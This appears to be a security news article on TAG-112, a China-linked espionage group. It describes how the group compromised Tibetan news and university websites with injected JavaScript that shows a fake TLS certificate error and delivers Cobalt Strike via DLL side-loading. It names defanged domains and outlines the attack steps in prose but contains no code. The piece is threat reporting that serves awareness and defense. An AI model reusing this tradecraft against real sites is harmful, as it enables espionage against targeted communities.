Chinese TAG-112 Targets Tibetan Sites with Cobalt Strike in Cyber Espionage A cyber espionage operation linked to Chinese interests, identified as TAG-112, has infiltrated Tibetan media and academic websites. The campaign's primary objective is to deliver Cobalt Strike, a tool for post-exploitation information gathering.

Malicious JavaScript and Fake Certificate Strategy

According to insights from the Insikt Group at Recorded Future, attackers embedded harmful JavaScript into the compromised sites, deceiving users with a counterfeit TLS certificate error. This trick entices unwary visitors to download a security certificate fabricated for this purpose but actually containing the Cobalt Strike payload. TAG-112, potentially an extension of the group Evasive Panda—variously recognized as Bronze Highland, Daggerfly, StormBamboo, and TAG-102—continues a strategic focus on Tibetan targets.

Websites Compromised

Affected Sites:

In late May 2024, the Tibet Post (tibetpost[.]net) and the Gyudmed Tantric University (gyudmedtantricuniversity[.]org) websites were breached by TAG-112. The exploit works through a manipulated visitor download, tricking users into executing a supposed security certificate that unleashes the Cobalt Strike Beacon.

Vulnerability Exploited: The entry point was likely a security flaw in the Joomla CMS, utilized for uploading the malicious JavaScript.

Execution Process: The script activates upon the window.onload event, first detecting the user's operating system and browser to weed out non-Windows users.

Data Transmission: Browser data (e.g., Chrome or Edge) is relayed to a server (update.maskrisks[.]com), which crafts a deceptive version of a browser's TLS certificate error page.

Payload Delivery: This reworked alert instigates the immediate download of an executable masquerading as a *.dnspod[.]cn certificate, covertly introducing the Cobalt Strike payload through DLL side-loading.

Broader Context

It's essential to note that TAG-112's attack isn’t the first breach of the Tibet Post. Since September 2023, Evasive Panda has employed watering hole tactics to target Tibetan users, deploying tools like MgBot and Nightdoor. Despite overlapping techniques, Recorded Future distinguishes between the breaches, citing maturity differences. TAG-112’s actions lack the complexity of TAG-102's methods, suggesting TAG-112 as a less sophisticated subgroup targeting similar intelligence. This recent activity highlights the ongoing vulnerabilities within Tibetan digital spaces, underscoring the need for enhanced cybersecurity measures.

The link has been copied!